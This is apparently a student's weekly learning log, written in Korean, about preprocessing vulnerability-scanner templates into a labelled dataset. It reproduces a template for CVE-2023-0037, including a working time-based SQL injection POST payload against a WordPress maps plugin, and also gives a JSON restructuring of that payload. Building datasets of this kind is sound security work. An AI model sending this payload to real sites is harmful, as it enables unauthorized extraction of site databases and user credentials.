개발코스 2주차 WIL
WIL
- 이번 2주차때는 저번 1주차 때 각자 결정한 데이터셋을 전처리하기로 했었다.
나는 여기서 웹기반 공격 TEMPLATE만 뽑아야 하기 때문에 HTTP 파일을 이용해야하고,
HTTP에 들어가면 여러가지 있는데, 나는 우리 팀원분들과 협업이 필요하므로 CVE 라벨링을 할 수 있는 CVES 코드랑, 실제 공격인 EXPOSURES, VULNERABLITIES에 있는 파일을 전처리 했다.
id: CVE-2023-0037
info:
name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
author: riteshs4hu
severity: critical
description: |
The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
impact: |
Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including user credentials, map configuration data, and sensitive site information.
remediation: Fixed in 1.0.73
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-0037
- https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
- https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0037
cwe-id: CWE-89
epss-score: 0.66547
epss-percentile: 0.98471
cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: 10web
product: map_builder_for_google_maps
framework: wordpress
zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev,vuln
http:
- raw:
- |
@timeout: 15s
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'contains(body, "wd-google-maps")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a0047304502206b0beaf71de80bbe49bf6e989128f113a1e9f63cb7a9f98c239e80e055eeb022022100cb0133ac6853cb6610f85a431e4711ffa227e144c2d8aa31eb56a73d215abf4c:922c64590222798bb761d5b6d8e72950위의 원본 코드를 METHOD, PAYLOAD, MATCHERS, DESCRIPTION 정도로 전처리를 했다.
[
{
"cve_id": "CVE-2023-0037",
"vuln_name": "WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection",
"preprocessing_data": {
"METHOD": {
"verb": "POST",
"path": "/",
"headers": {
"Content-Type": "application/x-www-form-urlencoded"
},
"timeout": "15s"
},
"PAYLOAD": {
"raw_string": "radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km",
"injection_point": "radius",
"attack_type": "Time-based SQL Injection",
"marker": "SLEEP(7)"
},
"MATCHERS": {
"logic": "AND",
"conditions": [
{
"type": "dsl",
"value": "duration>=7",
"description": "Response time must be greater than or equal to 7 seconds"
},
{
"type": "word",
"part": "body",
"value": "wd-google-maps",
"description": "Response body must contain plugin footprint"
},
{
"type": "word",
"part": "header",
"value": "text/html",
"description": "Content-Type must be text/html"
}
]
},
"DESCRIPTION": {
"summary": "The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 contains an unauthenticated SQL injection vulnerability via the 'radius' parameter in AJAX actions.",
"impact": "critical",
"cvss_score": 9.8,
"remediation": "Update to version 1.0.73 or higher."
}
}
}
]
hello
개발 코스 2주차 고생하셨습니다!! 저번 주에 이어 데이터 전처리 과정 진행 중이시네요. 데이터셋과 개발할 서비스에 맞게 데이터 전처리 과정이 잘 진행되고 있는 것 같아요. 앞으로도 계속해서 파이팅입니다!!